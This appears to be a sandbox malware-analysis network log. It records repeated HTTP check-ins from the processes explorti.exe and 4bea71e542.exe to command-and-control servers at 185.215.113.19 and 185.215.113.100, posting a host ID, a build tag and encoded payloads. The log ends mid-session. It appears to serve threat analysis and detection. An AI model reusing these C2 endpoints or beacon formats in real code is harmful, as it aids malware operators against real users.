Sep 1, 2024 06:28:10.743817091 CEST	1236	IN	Data Raw: 03 00 00 85 c0 78 02 8b f3 8d 4d 84 e8 1a 02 00 00 8d 8d 78 ff ff ff e8 0f 02 00 00 8d 8d 6c ff ff ff e8 04 02 00 00 8d 8d 60 ff ff ff e8 f9 01 00 00 8d 4d a8 e8 f1 01 00 00 8d 8d 54 ff ff ff e8 e6 01 00 00 8d 4d 9c e8 de 01 00 00 5f 8b c6 5e 5b Data Ascii: xMxl`MTM_^[rU]AjYf9H}AjYf9HEE}xPG\|EIEE}`PGdE%}
Sep 1, 2024 06:28:10.743827105 CEST	328	IN	Data Raw: 0f 85 aa 00 04 00 a1 00 14 4d 00 85 c0 0f 84 b5 00 04 00 33 ff be 90 23 4d 00 47 3b c7 0f 84 b1 00 04 00 8d 44 24 11 50 51 68 00 14 4d 00 68 18 14 4d 00 8b ce e8 2c 03 00 00 84 c0 0f 84 b1 00 04 00 a0 90 23 4d 00 a2 04 14 4d 00 a0 91 23 4d 00 88 Data Ascii: M3#MG;D$PQhMhM,#MM#MD$D$P$<Ph5MhIt$MY@\$5MhMa\|$sY4=MMuW0M=MuD$8PI
Sep 1, 2024 06:28:10.743936062 CEST	1236	IN	Data Raw: ff d6 68 a2 00 00 00 ff 35 58 13 4d 00 a3 e8 13 4d 00 ff d6 33 f6 a3 ec 13 4d 00 56 6a 10 6a 10 6a 01 6a 63 ff 35 58 13 4d 00 ff 15 a0 c5 49 00 8b 0d 58 13 4d 00 8b d0 a1 e0 13 4d 00 89 45 e8 8d 45 d0 50 89 15 e4 13 4d 00 c7 45 d0 30 00 00 00 c7 Data Ascii: h5XMM3MVjjjjc5XMIXMMEEPME0E#uuM}]uEIUEV1@0I5MfTM5MQv_^[VW5,I3W5XMWWjdh,PPhIPPWW5XMMjPWWWWhPWhIW5(
Sep 1, 2024 06:28:10.753453016 CEST	1236	IN	Data Raw: 3b 0c 90 74 08 ff 34 90 e8 21 78 00 00 b0 01 5d c2 04 00 8b 4d 08 68 08 cc 49 00 e8 9e 3a 00 00 32 c0 eb eb 56 57 8b f9 8d 77 14 8b ce e8 15 37 00 00 83 27 00 8b ce c6 47 24 00 c7 06 34 cc 49 00 e8 01 37 00 00 ff 76 04 e8 2d cd 01 00 59 8d 4f 04 Data Ascii: ;t4!x]MhI:2VWw7'G$4I7v-YO_^gU=hMtP3hPhMTPMLHHPPjIUuUuMYY]UQMSVW;u^v_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49716	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:12.812720060 CEST	182	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 35 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000053001&unit=246122658369
Sep 1, 2024 06:28:13.541237116 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49718	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:13.661907911 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:14.410284996 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:14.507797956 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:14.757280111 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49721	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:15.957053900 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:16.460330009 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:16.476480007 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:16.728364944 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49730	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:16.849431038 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:17.594091892 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:17.594856024 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:17.843235016 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49732	185.215.113.100	80	6604	C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:17.903256893 CEST	90	OUT	GET / HTTP/1.1 Host: 185.215.113.100 Connection: Keep-Alive Cache-Control: no-cache
Sep 1, 2024 06:28:18.644939899 CEST	203	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 04:28:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 1, 2024 06:28:18.647526979 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJDHJKFIECAAKFIJJKJ Host: 185.215.113.100 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 34 42 38 34 36 32 41 30 45 35 38 34 35 37 37 30 33 39 37 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="hwid"8F4B8462A0E5845770397------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="build"leva------EHJDHJKFIECAAKFIJJKJ--
Sep 1, 2024 06:28:18.895711899 CEST	210	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 04:28:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49734	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:18.010082960 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:18.756365061 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:18.757287025 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:19.015863895 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49743	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:19.153245926 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:19.904803991 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:19.938576937 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:20.187405109 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49755	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:20.330578089 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:21.082792997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:21.088365078 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:21.348237991 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49756	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:21.460143089 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:22.209742069 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:22.539335966 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:22.792716980 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49762	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:22.911849976 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:23.663600922 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:23.664385080 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:23.914882898 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49765	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:24.033957958 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:24.785598040 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:24.818583012 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:25.066498041 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49766	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:28:25.175249100 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:28:25.939480066 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:28:25.944617987 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:28:26.192711115 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:28:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49767	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
